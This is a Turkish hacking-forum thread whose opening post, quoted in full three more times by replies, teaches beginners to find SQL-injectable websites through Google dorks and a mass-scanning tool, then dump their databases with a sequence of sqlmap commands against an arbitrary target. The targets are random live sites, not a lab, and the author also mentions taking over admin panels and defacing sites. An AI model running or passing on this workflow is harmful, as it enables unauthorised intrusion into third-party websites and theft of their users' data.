Birlikte Web Site Hackleyelim!!!

.net :)

Katılımcı Üye
6 Ağu 2022
326
373
: Onun olduğu hiçbir yerde
Öncellikle siz değerli forum üyemizi/yöneticimizi burda görmekten mutluluk duyuyorum

Bugünki konumda dork oluşturup oluşturduğumuz dorkları tarayıp sql açıklı siteler bulup o sitelerden bir tanesini birlikte hackliyelim ne dersiniz ?
6OfL8I.gif




Konunun Temel Amacı Ne ?

Bu konuyu açmamdaki temel amaç web hacking başlıyacak olan arkadaşlara bir nebze bile olsun yol göstermek kafalarında bir fikir oluşturmak
Konunun Sonunda Ne Elde Edeceksiniz ?

Bu konu sonunda temel olarak dork oluşturabilecek, dorkları taratıp sql açıklı site tespit edip bu zaafiyetli sitelerden gerekli verileri ele geçirebileceksiniz
Herhangi bir sorunuz olursa lütfen konu altında belirtiniz
Başlıyalım 😄
6OfL8I.gif

1- Dork (Google Dorks) Oluşturma


Nedir Bu Google Dork ?

Google dork, özel anahtar kelimeler veya operatörler kullanarak Google'da arama yapmak için kullanılan bir terimdir. Google dorkları, arama sonuçlarında belirli türdeki bilgileri, hassas bilgileri veya güvenlik açıklarını ortaya çıkarmak için kullanılabilir. Bazı yaygın kullanılan Google dorkları şunlardır:
  1. site: belirli bir web sitesinde arama yapmak için kullanılır
  2. inurl: URL'lerin belirli bir kelimeyi içermesini sağlar
  3. intitle: belirli bir başlığı olan sayfaları listeler
  4. filetype: belirli bir dosya türünü arar (pdf, doc, xls vb.)
  5. link: belirli bir URL'ye bağlantı veren sayfaları listeler


Otomatik Olarak Zaafiyetli Google Dork Oluşturma


Ben şahsım adına dork oluşturmak için bizzat emek vererek @Mentalistler hocanın biz forum üyeleri için oluşturmuş olduğu Dork Studio toolunu kullanacağım siz başka toolarda kullanabilirsiniz

İlk olarak toolumuzu Githubtan git clone yaparak indirmemiz gerekir bunun için terminalimize

Kod:
git clone https://github.com/mentalistler/Dork-Studio.git

yazıyoruz sonrasında ise sırasıyla
Kod:
cd Dork-Studio/

Kod:
python -m pip install -r requirements.txt

yaptıktan sonra toolu çalıştırmak için

Kod:
python manage.py runserver

ve tarafımıza böyle bir çıktı verecektir



bpo50gx.png




şimdi ise tarayıcımızın url kısmına
http://localhost:8000 yazıyoruz Karşımıza böyle bir arayüz gelecek



6tdfmfu.png



burda ilk olarak oluşturmak istediğimiz dork türünü seçiyoruz daha sonra ise wordlist seçelim ve istediğimiz herhangi bir ülke varsa onuda seçip devam et (Next) diyoruz daha sonraki ekranımız bu şekilde olacaktır



b7w580b.png




Burda üretmek istediğiniz dork sayısını giriniz daha sonrasında eğerki wordlist seçtiyseniz herhangi bir karakter sayısı girmenize gerek yok karşımıza vereceği çıktı bu şekilde olacaktır



OP7Vy6K.png



Burdan txt görünümünü seçip kopyalıyoruz şimdi ise 2.toolumuz olan dork tarama ve sql açıklı site bulmak için biz forum üyeleri için bizzat @Mentalistler

tarafından yapılmış bit tool olan fetisql v2 kullanacağız bunun için ilk olarak sırasıyla


Kod:
git clone https://github.com/mentalistler/FetiSQL-V2.git
cd FetiSQL-V2
pip install -r requirements.txt
python main.py


Açılan menüde ilk olarak dork taratacağımız için ilk önce FetiSQL-V2 klasorüne gelip files/dorks.txt içine kopyaladığımız (oluşturduğumuz) dorkları yapıştırıyoruz kaydedip çıktıktan sonra terminalden FetiSQL-V2 çalıştırıyoruz

SQL açık kontrolü

Bunun için ekstra bir tool kurmamıza gerek yok zaten bu FetiSQL-V2 de mevcut bunun için menüden 2 diyip devam ediyoruz. Eğerki siz başka bir tooldan tarattıysanız dorklarınızı bulunan result dosyasını result/result.txt içine kaydediniz.işlem sonucunda açık olan siteleri bizler için böyle tek tek kaydedecektir.


cpragHD.png


Veri Çekme Nasıl Yapılır ?

Öncellikle FetiSQL-V2 toolumuzun bize verdiği açıklı siteler result/sql.txt içine kaydediliyor ordaki açıklı site linkini kopyalayıp yeni bir terminalde


Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --dbs



fzwcahj.png


(çıktımız buna benzer olacaktır)

yapıp sitenin içinde barındırdığı database isimlerinini buluyoruz. (unutmadan eklemek istiyorum bu adımlarda y/n gibi sorular soruyor bazen bunlar c/s/q olabiliyor bu durumda sqlmap size önerdiğini büyük harfle gösterecektir Y/n gibi) Sonra ise




Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --current-db





yazıp hedef açıklı sitede aktif olarak kullanılan database ismini alıyoruz çıktımız bu sekilde olacaktır.



4ah0cza.png




şimdi ise database içinde bulunan tabloları görüntüliyelim bunun için



Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --tables -D current db sonucumuzu yazıyoruz



iinesfj.png




çıktımız bu şekilde olacaktır burda tablo isimlerimizden az çok içinde hangi tür veriler bulunduğunu tahmin edebiliyoruz mesela benim örnekte önemli veriler kubrc_users ta olduğunu düşünüyorum şimdi ise bakalım seçtiğimiz tablonun içinde neler mevcutmuş bunun için




Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi



7.PNG




çıktımız buna benziyecek peki burda neler olduğunu gördük ve önemli bilgiler mevcut nasıl içeriğine bakacaz derseniz bunun için




Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi --dump



ve en son olarak bize verilerin nereye kaydedildiğini gösterir dosya yolunu kopyalayıp erişebilirsiniz



6OfL8I.gif




Önemli Bilgilendirmeler​


1- Bazen veriler şifrelenmiş olarak gelebilir bunların terimsel isimlerine hash diyoruz bunları kırmak bazen zahmetli olabiliyor ancak kırılmayacak herhangi bir şifre yoktur.
2- @Mentalistler hoccanın tooları oldukça iyi daha detaylı bilgi için
3- FetiSQL-V2 konu linki FetiSQL-V2
4-
Dork-Studio konu linki Dork-Studio
5-
SQL ile herhangi bir bilginiz yok ise Web Hacking Giriş
6-
hashları kırmak için Pass The Hash Saldırısı



6OfL8I.gif


Umarım Faydalı Olabilmişimdir :)
 

Liprow

Katılımcı Üye
15 Şub 2021
409
508
"1- Bazen veriler şifrelenmiş olarak gelebilir bunların terimsel isimlerine hash diyoruz bunları kırmak bazen zahmetli olabiliyor ancak kırılmayacak herhangi bir şifre yoktur."

Emin misin?
 

.net :)

Katılımcı Üye
6 Ağu 2022
326
373
: Onun olduğu hiçbir yerde
Elinize sağlık, lâkin ben burada site hackleme göremedim. Site database çekmeyi gördüm.
Öncelikle Database çekip dump etmekte bir hack sayılır daha sonra ise zaten admin şifresi db de mevcut ise yapacağı tek şey admin panel bulup login olmak ve gerisi ona kalmış son olarakta bazı problemlerden dolayı istediğim kadar detaylı anlatamadım yoksa admin panelde upload olmadan index atmayı da gösterecektim normalde
 

Blwe

Uzman üye
17 Şub 2021
1,585
1,645
Green/Moderasyon
Öncelikle Database çekip dump etmekte bir hack sayılır daha sonra ise zaten admin şifresi db de mevcut ise yapacağı tek şey admin panel bulup login olmak ve gerisi ona kalmış son olarakta bazı problemlerden dolayı istediğim kadar detaylı anlatamadım yoksa admin panelde upload olmadan index atmayı da gösterecektim normalde
Sql açığını tool yardımı ile sömürüp database'i dump etmek pek hack sayılmaz bana göre. Lâkin size göre sayılıyor ise, sizin düşüncenize bir şey diyemem. Yinede konunuzu beğendim, çünkü ortada heves kullanılarak hazırlanmış bir emek var. Emeğe saygı duyarım, başarılarınız daim olsun.
 

.net :)

Katılımcı Üye
6 Ağu 2022
326
373
: Onun olduğu hiçbir yerde
Sql açığını tool yardımı ile sömürüp database'i dump etmek pek hack sayılmaz bana göre. Lâkin size göre sayılıyor ise, sizin düşüncenize bir şey diyemem. Yinede konunuzu beğendim, çünkü ortada heves kullanılarak hazırlanmış bir emek var. Emeğe saygı duyarım, başarılarınız daim olsun.
Dediğim bazı teknik aksaklıklardan dolayı malesef şimdilik bu kadar yapabildim yoksa index atmayı falan mutlaka ekliyecektim
Teşekkür ederim sizede başarılar 😇
 

Suppressor

Request Uzmanı
16 Kas 2022
1,177
682
always, everywhere
Öncellikle siz değerli forum üyemizi/yöneticimizi burda görmekten mutluluk duyuyorum

Bugünki konumda dork oluşturup oluşturduğumuz dorkları tarayıp sql açıklı siteler bulup o sitelerden bir tanesini birlikte hackliyelim ne dersiniz ?
6OfL8I.gif




Konunun Temel Amacı Ne ?

Bu konuyu açmamdaki temel amaç web hacking başlıyacak olan arkadaşlara bir nebze bile olsun yol göstermek kafalarında bir fikir oluşturmak
Konunun Sonunda Ne Elde Edeceksiniz ?

Bu konu sonunda temel olarak dork oluşturabilecek, dorkları taratıp sql açıklı site tespit edip bu zaafiyetli sitelerden gerekli verileri ele geçirebileceksiniz
Herhangi bir sorunuz olursa lütfen konu altında belirtiniz
Başlıyalım 😄
6OfL8I.gif

1- Dork (Google Dorks) Oluşturma


Nedir Bu Google Dork ?

Google dork, özel anahtar kelimeler veya operatörler kullanarak Google'da arama yapmak için kullanılan bir terimdir. Google dorkları, arama sonuçlarında belirli türdeki bilgileri, hassas bilgileri veya güvenlik açıklarını ortaya çıkarmak için kullanılabilir. Bazı yaygın kullanılan Google dorkları şunlardır:
  1. site: belirli bir web sitesinde arama yapmak için kullanılır
  2. inurl: URL'lerin belirli bir kelimeyi içermesini sağlar
  3. intitle: belirli bir başlığı olan sayfaları listeler
  4. filetype: belirli bir dosya türünü arar (pdf, doc, xls vb.)
  5. link: belirli bir URL'ye bağlantı veren sayfaları listeler


Otomatik Olarak Zaafiyetli Google Dork Oluşturma


Ben şahsım adına dork oluşturmak için bizzat emek vererek @Mentalistler hocanın biz forum üyeleri için oluşturmuş olduğu Dork Studio toolunu kullanacağım siz başka toolarda kullanabilirsiniz

İlk olarak toolumuzu Githubtan git clone yaparak indirmemiz gerekir bunun için terminalimize

Kod:
git clone https://github.com/mentalistler/Dork-Studio.git

yazıyoruz sonrasında ise sırasıyla
Kod:
cd Dork-Studio/

Kod:
python -m pip install -r requirements.txt

yaptıktan sonra toolu çalıştırmak için

Kod:
python manage.py runserver

ve tarafımıza böyle bir çıktı verecektir



bpo50gx.png




şimdi ise tarayıcımızın url kısmına
http://localhost:8000 yazıyoruz Karşımıza böyle bir arayüz gelecek



6tdfmfu.png



burda ilk olarak oluşturmak istediğimiz dork türünü seçiyoruz daha sonra ise wordlist seçelim ve istediğimiz herhangi bir ülke varsa onuda seçip devam et (Next) diyoruz daha sonraki ekranımız bu şekilde olacaktır



b7w580b.png




Burda üretmek istediğiniz dork sayısını giriniz daha sonrasında eğerki wordlist seçtiyseniz herhangi bir karakter sayısı girmenize gerek yok karşımıza vereceği çıktı bu şekilde olacaktır



OP7Vy6K.png



Burdan txt görünümünü seçip kopyalıyoruz şimdi ise 2.toolumuz olan dork tarama ve sql açıklı site bulmak için biz forum üyeleri için bizzat @Mentalistler

tarafından yapılmış bit tool olan fetisql v2 kullanacağız bunun için ilk olarak sırasıyla


Kod:
git clone https://github.com/mentalistler/FetiSQL-V2.git
cd FetiSQL-V2
pip install -r requirements.txt
python main.py


Açılan menüde ilk olarak dork taratacağımız için ilk önce FetiSQL-V2 klasorüne gelip files/dorks.txt içine kopyaladığımız (oluşturduğumuz) dorkları yapıştırıyoruz kaydedip çıktıktan sonra terminalden FetiSQL-V2 çalıştırıyoruz

SQL açık kontrolü

Bunun için ekstra bir tool kurmamıza gerek yok zaten bu FetiSQL-V2 de mevcut bunun için menüden 2 diyip devam ediyoruz. Eğerki siz başka bir tooldan tarattıysanız dorklarınızı bulunan result dosyasını result/result.txt içine kaydediniz.işlem sonucunda açık olan siteleri bizler için böyle tek tek kaydedecektir.


cpragHD.png


Veri Çekme Nasıl Yapılır ?

Öncellikle FetiSQL-V2 toolumuzun bize verdiği açıklı siteler result/sql.txt içine kaydediliyor ordaki açıklı site linkini kopyalayıp yeni bir terminalde


Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --dbs



fzwcahj.png


(çıktımız buna benzer olacaktır)

yapıp sitenin içinde barındırdığı database isimlerinini buluyoruz. (unutmadan eklemek istiyorum bu adımlarda y/n gibi sorular soruyor bazen bunlar c/s/q olabiliyor bu durumda sqlmap size önerdiğini büyük harfle gösterecektir Y/n gibi) Sonra ise




Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --current-db





yazıp hedef açıklı sitede aktif olarak kullanılan database ismini alıyoruz çıktımız bu sekilde olacaktır.



4ah0cza.png




şimdi ise database içinde bulunan tabloları görüntüliyelim bunun için



Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --tables -D current db sonucumuzu yazıyoruz



iinesfj.png




çıktımız bu şekilde olacaktır burda tablo isimlerimizden az çok içinde hangi tür veriler bulunduğunu tahmin edebiliyoruz mesela benim örnekte önemli veriler kubrc_users ta olduğunu düşünüyorum şimdi ise bakalım seçtiğimiz tablonun içinde neler mevcutmuş bunun için




Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi



7.PNG




çıktımız buna benziyecek peki burda neler olduğunu gördük ve önemli bilgiler mevcut nasıl içeriğine bakacaz derseniz bunun için




Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi --dump



ve en son olarak bize verilerin nereye kaydedildiğini gösterir dosya yolunu kopyalayıp erişebilirsiniz



6OfL8I.gif




Önemli Bilgilendirmeler​


1- Bazen veriler şifrelenmiş olarak gelebilir bunların terimsel isimlerine hash diyoruz bunları kırmak bazen zahmetli olabiliyor ancak kırılmayacak herhangi bir şifre yoktur.
2- @Mentalistler hoccanın tooları oldukça iyi daha detaylı bilgi için
3- FetiSQL-V2 konu linki FetiSQL-V2
4-
Dork-Studio konu linki Dork-Studio
5-
SQL ile herhangi bir bilginiz yok ise Web Hacking Giriş
6-
hashları kırmak için Pass The Hash Saldırısı



6OfL8I.gif


Umarım Faydalı Olabilmişimdir :)
Eline sağlık.
 

AwiR

Katılımcı Üye
4 Ocak 2020
503
211
Öncellikle siz değerli forum üyemizi/yöneticimizi burda görmekten mutluluk duyuyorum

Bugünki konumda dork oluşturup oluşturduğumuz dorkları tarayıp sql açıklı siteler bulup o sitelerden bir tanesini birlikte hackliyelim ne dersiniz ?
6OfL8I.gif




Konunun Temel Amacı Ne ?

Bu konuyu açmamdaki temel amaç web hacking başlıyacak olan arkadaşlara bir nebze bile olsun yol göstermek kafalarında bir fikir oluşturmak
Konunun Sonunda Ne Elde Edeceksiniz ?

Bu konu sonunda temel olarak dork oluşturabilecek, dorkları taratıp sql açıklı site tespit edip bu zaafiyetli sitelerden gerekli verileri ele geçirebileceksiniz
Herhangi bir sorunuz olursa lütfen konu altında belirtiniz
Başlıyalım 😄
6OfL8I.gif

1- Dork (Google Dorks) Oluşturma


Nedir Bu Google Dork ?

Google dork, özel anahtar kelimeler veya operatörler kullanarak Google'da arama yapmak için kullanılan bir terimdir. Google dorkları, arama sonuçlarında belirli türdeki bilgileri, hassas bilgileri veya güvenlik açıklarını ortaya çıkarmak için kullanılabilir. Bazı yaygın kullanılan Google dorkları şunlardır:
  1. site: belirli bir web sitesinde arama yapmak için kullanılır
  2. inurl: URL'lerin belirli bir kelimeyi içermesini sağlar
  3. intitle: belirli bir başlığı olan sayfaları listeler
  4. filetype: belirli bir dosya türünü arar (pdf, doc, xls vb.)
  5. link: belirli bir URL'ye bağlantı veren sayfaları listeler


Otomatik Olarak Zaafiyetli Google Dork Oluşturma


Ben şahsım adına dork oluşturmak için bizzat emek vererek @Mentalistler hocanın biz forum üyeleri için oluşturmuş olduğu Dork Studio toolunu kullanacağım siz başka toolarda kullanabilirsiniz

İlk olarak toolumuzu Githubtan git clone yaparak indirmemiz gerekir bunun için terminalimize

Kod:
git clone https://github.com/mentalistler/Dork-Studio.git

yazıyoruz sonrasında ise sırasıyla
Kod:
cd Dork-Studio/

Kod:
python -m pip install -r requirements.txt

yaptıktan sonra toolu çalıştırmak için

Kod:
python manage.py runserver

ve tarafımıza böyle bir çıktı verecektir



bpo50gx.png




şimdi ise tarayıcımızın url kısmına
http://localhost:8000 yazıyoruz Karşımıza böyle bir arayüz gelecek



6tdfmfu.png



burda ilk olarak oluşturmak istediğimiz dork türünü seçiyoruz daha sonra ise wordlist seçelim ve istediğimiz herhangi bir ülke varsa onuda seçip devam et (Next) diyoruz daha sonraki ekranımız bu şekilde olacaktır



b7w580b.png




Burda üretmek istediğiniz dork sayısını giriniz daha sonrasında eğerki wordlist seçtiyseniz herhangi bir karakter sayısı girmenize gerek yok karşımıza vereceği çıktı bu şekilde olacaktır



OP7Vy6K.png



Burdan txt görünümünü seçip kopyalıyoruz şimdi ise 2.toolumuz olan dork tarama ve sql açıklı site bulmak için biz forum üyeleri için bizzat @Mentalistler

tarafından yapılmış bit tool olan fetisql v2 kullanacağız bunun için ilk olarak sırasıyla


Kod:
git clone https://github.com/mentalistler/FetiSQL-V2.git
cd FetiSQL-V2
pip install -r requirements.txt
python main.py


Açılan menüde ilk olarak dork taratacağımız için ilk önce FetiSQL-V2 klasorüne gelip files/dorks.txt içine kopyaladığımız (oluşturduğumuz) dorkları yapıştırıyoruz kaydedip çıktıktan sonra terminalden FetiSQL-V2 çalıştırıyoruz

SQL açık kontrolü

Bunun için ekstra bir tool kurmamıza gerek yok zaten bu FetiSQL-V2 de mevcut bunun için menüden 2 diyip devam ediyoruz. Eğerki siz başka bir tooldan tarattıysanız dorklarınızı bulunan result dosyasını result/result.txt içine kaydediniz.işlem sonucunda açık olan siteleri bizler için böyle tek tek kaydedecektir.


cpragHD.png


Veri Çekme Nasıl Yapılır ?

Öncellikle FetiSQL-V2 toolumuzun bize verdiği açıklı siteler result/sql.txt içine kaydediliyor ordaki açıklı site linkini kopyalayıp yeni bir terminalde


Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --dbs



fzwcahj.png


(çıktımız buna benzer olacaktır)

yapıp sitenin içinde barındırdığı database isimlerinini buluyoruz. (unutmadan eklemek istiyorum bu adımlarda y/n gibi sorular soruyor bazen bunlar c/s/q olabiliyor bu durumda sqlmap size önerdiğini büyük harfle gösterecektir Y/n gibi) Sonra ise




Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --current-db





yazıp hedef açıklı sitede aktif olarak kullanılan database ismini alıyoruz çıktımız bu sekilde olacaktır.



4ah0cza.png




şimdi ise database içinde bulunan tabloları görüntüliyelim bunun için



Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --tables -D current db sonucumuzu yazıyoruz



iinesfj.png




çıktımız bu şekilde olacaktır burda tablo isimlerimizden az çok içinde hangi tür veriler bulunduğunu tahmin edebiliyoruz mesela benim örnekte önemli veriler kubrc_users ta olduğunu düşünüyorum şimdi ise bakalım seçtiğimiz tablonun içinde neler mevcutmuş bunun için




Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi



7.PNG




çıktımız buna benziyecek peki burda neler olduğunu gördük ve önemli bilgiler mevcut nasıl içeriğine bakacaz derseniz bunun için




Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi --dump



ve en son olarak bize verilerin nereye kaydedildiğini gösterir dosya yolunu kopyalayıp erişebilirsiniz



6OfL8I.gif




Önemli Bilgilendirmeler​


1- Bazen veriler şifrelenmiş olarak gelebilir bunların terimsel isimlerine hash diyoruz bunları kırmak bazen zahmetli olabiliyor ancak kırılmayacak herhangi bir şifre yoktur.
2- @Mentalistler hoccanın tooları oldukça iyi daha detaylı bilgi için
3- FetiSQL-V2 konu linki FetiSQL-V2
4-
Dork-Studio konu linki Dork-Studio
5-
SQL ile herhangi bir bilginiz yok ise Web Hacking Giriş
6-
hashları kırmak için Pass The Hash Saldırısı



6OfL8I.gif


Umarım Faydalı Olabilmişimdir :)
Eline Sağlık Güzel Çalışma Olmuş.
 

taklan_br_12

Katılımcı Üye
20 Kas 2021
416
98
Öncellikle siz değerli forum üyemizi/yöneticimizi burda görmekten mutluluk duyuyorum

Bugünki konumda dork oluşturup oluşturduğumuz dorkları tarayıp sql açıklı siteler bulup o sitelerden bir tanesini birlikte hackliyelim ne dersiniz ?
6OfL8I.gif




Konunun Temel Amacı Ne ?

Bu konuyu açmamdaki temel amaç web hacking başlıyacak olan arkadaşlara bir nebze bile olsun yol göstermek kafalarında bir fikir oluşturmak
Konunun Sonunda Ne Elde Edeceksiniz ?

Bu konu sonunda temel olarak dork oluşturabilecek, dorkları taratıp sql açıklı site tespit edip bu zaafiyetli sitelerden gerekli verileri ele geçirebileceksiniz
Herhangi bir sorunuz olursa lütfen konu altında belirtiniz
Başlıyalım 😄
6OfL8I.gif

1- Dork (Google Dorks) Oluşturma


Nedir Bu Google Dork ?

Google dork, özel anahtar kelimeler veya operatörler kullanarak Google'da arama yapmak için kullanılan bir terimdir. Google dorkları, arama sonuçlarında belirli türdeki bilgileri, hassas bilgileri veya güvenlik açıklarını ortaya çıkarmak için kullanılabilir. Bazı yaygın kullanılan Google dorkları şunlardır:
  1. site: belirli bir web sitesinde arama yapmak için kullanılır
  2. inurl: URL'lerin belirli bir kelimeyi içermesini sağlar
  3. intitle: belirli bir başlığı olan sayfaları listeler
  4. filetype: belirli bir dosya türünü arar (pdf, doc, xls vb.)
  5. link: belirli bir URL'ye bağlantı veren sayfaları listeler


Otomatik Olarak Zaafiyetli Google Dork Oluşturma


Ben şahsım adına dork oluşturmak için bizzat emek vererek @Mentalistler hocanın biz forum üyeleri için oluşturmuş olduğu Dork Studio toolunu kullanacağım siz başka toolarda kullanabilirsiniz

İlk olarak toolumuzu Githubtan git clone yaparak indirmemiz gerekir bunun için terminalimize

Kod:
git clone https://github.com/mentalistler/Dork-Studio.git

yazıyoruz sonrasında ise sırasıyla
Kod:
cd Dork-Studio/

Kod:
python -m pip install -r requirements.txt

yaptıktan sonra toolu çalıştırmak için

Kod:
python manage.py runserver

ve tarafımıza böyle bir çıktı verecektir



bpo50gx.png




şimdi ise tarayıcımızın url kısmına
http://localhost:8000 yazıyoruz Karşımıza böyle bir arayüz gelecek



6tdfmfu.png



burda ilk olarak oluşturmak istediğimiz dork türünü seçiyoruz daha sonra ise wordlist seçelim ve istediğimiz herhangi bir ülke varsa onuda seçip devam et (Next) diyoruz daha sonraki ekranımız bu şekilde olacaktır



b7w580b.png




Burda üretmek istediğiniz dork sayısını giriniz daha sonrasında eğerki wordlist seçtiyseniz herhangi bir karakter sayısı girmenize gerek yok karşımıza vereceği çıktı bu şekilde olacaktır



OP7Vy6K.png



Burdan txt görünümünü seçip kopyalıyoruz şimdi ise 2.toolumuz olan dork tarama ve sql açıklı site bulmak için biz forum üyeleri için bizzat @Mentalistler

tarafından yapılmış bit tool olan fetisql v2 kullanacağız bunun için ilk olarak sırasıyla


Kod:
git clone https://github.com/mentalistler/FetiSQL-V2.git
cd FetiSQL-V2
pip install -r requirements.txt
python main.py


Açılan menüde ilk olarak dork taratacağımız için ilk önce FetiSQL-V2 klasorüne gelip files/dorks.txt içine kopyaladığımız (oluşturduğumuz) dorkları yapıştırıyoruz kaydedip çıktıktan sonra terminalden FetiSQL-V2 çalıştırıyoruz

SQL açık kontrolü

Bunun için ekstra bir tool kurmamıza gerek yok zaten bu FetiSQL-V2 de mevcut bunun için menüden 2 diyip devam ediyoruz. Eğerki siz başka bir tooldan tarattıysanız dorklarınızı bulunan result dosyasını result/result.txt içine kaydediniz.işlem sonucunda açık olan siteleri bizler için böyle tek tek kaydedecektir.


cpragHD.png


Veri Çekme Nasıl Yapılır ?

Öncellikle FetiSQL-V2 toolumuzun bize verdiği açıklı siteler result/sql.txt içine kaydediliyor ordaki açıklı site linkini kopyalayıp yeni bir terminalde


Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --dbs



fzwcahj.png


(çıktımız buna benzer olacaktır)

yapıp sitenin içinde barındırdığı database isimlerinini buluyoruz. (unutmadan eklemek istiyorum bu adımlarda y/n gibi sorular soruyor bazen bunlar c/s/q olabiliyor bu durumda sqlmap size önerdiğini büyük harfle gösterecektir Y/n gibi) Sonra ise




Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --current-db





yazıp hedef açıklı sitede aktif olarak kullanılan database ismini alıyoruz çıktımız bu sekilde olacaktır.



4ah0cza.png




şimdi ise database içinde bulunan tabloları görüntüliyelim bunun için



Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --tables -D current db sonucumuzu yazıyoruz



iinesfj.png




çıktımız bu şekilde olacaktır burda tablo isimlerimizden az çok içinde hangi tür veriler bulunduğunu tahmin edebiliyoruz mesela benim örnekte önemli veriler kubrc_users ta olduğunu düşünüyorum şimdi ise bakalım seçtiğimiz tablonun içinde neler mevcutmuş bunun için




Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi



7.PNG




çıktımız buna benziyecek peki burda neler olduğunu gördük ve önemli bilgiler mevcut nasıl içeriğine bakacaz derseniz bunun için




Kod:
sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi --dump



ve en son olarak bize verilerin nereye kaydedildiğini gösterir dosya yolunu kopyalayıp erişebilirsiniz



6OfL8I.gif




Önemli Bilgilendirmeler​


1- Bazen veriler şifrelenmiş olarak gelebilir bunların terimsel isimlerine hash diyoruz bunları kırmak bazen zahmetli olabiliyor ancak kırılmayacak herhangi bir şifre yoktur.
2- @Mentalistler hoccanın tooları oldukça iyi daha detaylı bilgi için
3- FetiSQL-V2 konu linki FetiSQL-V2
4-
Dork-Studio konu linki Dork-Studio
5-
SQL ile herhangi bir bilginiz yok ise Web Hacking Giriş
6-
hashları kırmak için Pass The Hash Saldırısı



6OfL8I.gif


Umarım Faydalı Olabilmişimdir :)
Elinize sağlık hocam
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.